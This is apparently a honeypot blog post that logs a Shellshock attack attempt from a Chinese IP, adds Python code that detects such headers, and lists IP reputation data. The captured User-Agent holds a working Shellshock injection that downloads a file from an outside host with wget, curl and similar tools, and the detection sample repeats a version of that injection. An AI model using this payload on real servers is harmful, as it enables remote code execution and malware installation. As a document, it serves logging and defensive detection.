Monday, 31 August 2015

Perl favicon.icon Download attempt - 211.144.37.41


BEGIN OF HTTP DATA:
2015-08-30 15:49:21
Source IP: 211.144.37.41
Country: CN RiskScore: 10 Malware: []
GET /phppath/cgi_wrapper HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://46.38.251.16/favicon.icon;curl http://46.38.251.16/favicon.icon;GET http://46.38.251.16/favicon.icon;lwp-download http://46.38.251.16/favicon.icon;lynx http://46.38.251.16/favicon.icon ");'
Host: 195.169.125.87
Connection: Close

Sadly I get a connection refused by the server, so I am unable to get the specified file.
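
The Python below flags any request header whose value begins with the bash function-definition prefix `() {` seen in the User-Agent above (the Shellshock probe pattern), and pulls out the URLs the injected command would fetch so they can be blocklisted. It is an added example, not part of the original post or the honeypot's code; the function names and the sample request, which uses documentation addresses, are constructed for illustration.

```python
import re

# Bash function-definition prefix that Shellshock probes put at the start of a header value.
FUNC_DEF = re.compile(r"^\s*\(\)\s*\{")
# URLs inside the injected command, stopping at shell separators and quotes.
URL = re.compile(r"https?://[^\s;\"')]+")

# Constructed sample modelled on the capture above (192.0.2.x / 198.51.100.x are documentation ranges).
SAMPLE = (
    "GET /phppath/cgi_wrapper HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "User-Agent: () { :;};/usr/bin/perl -e 'system(\"wget http://192.0.2.10/favicon.icon;"
    "curl http://192.0.2.10/favicon.icon\");'\r\n"
    "Host: 198.51.100.7\r\n"
    "Connection: Close\r\n"
    "\r\n"
)

def parse_headers(raw):
    """Split a raw request into (request_line, [(name, value), ...])."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:  # skip lines that are not "Name: value"
            headers.append((name.strip(), value.strip()))
    return lines[0], headers

def find_shellshock(raw):
    """Return one finding per header whose value starts with a bash function definition."""
    request_line, headers = parse_headers(raw)
    findings = []
    for name, value in headers:
        if FUNC_DEF.match(value):
            # De-duplicate the URLs while keeping first-seen order.
            urls = list(dict.fromkeys(URL.findall(value)))
            findings.append({"request": request_line, "header": name, "urls": urls})
    return findings

if __name__ == "__main__":
    for finding in find_shellshock(SAMPLE):
        print(finding["header"], finding["urls"])
```

The check inspects every header, not only User-Agent, because a CGI environment exports each request header to the shell as a variable.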

The source IP
Blacklist Status: BLACKLISTED 13/40
IP Address: 211.144.37.41
Reverse DNS: Unknown
ASN: AS9811
ASN Owner: srit corp.,beijing.
ISP: China Network Information Center
Continent: Asia

The download IP
Blacklist Status: POSSIBLY SAFE 0/40
IP Address: 46.38.251.16
Reverse DNS: v220100240662590.yourvserver.net
ASN: AS197540
ASN Owner: netcup GmbH
ISP: netcup GmbH
Continent: Europe

IBM X-Force data for 211.144.37.41
"cats": {
      "Anonymisation Services": 86,
      "Spam": 100
   },
   "geo": {
      "country": "China",
      "countrycode": "CN"
   },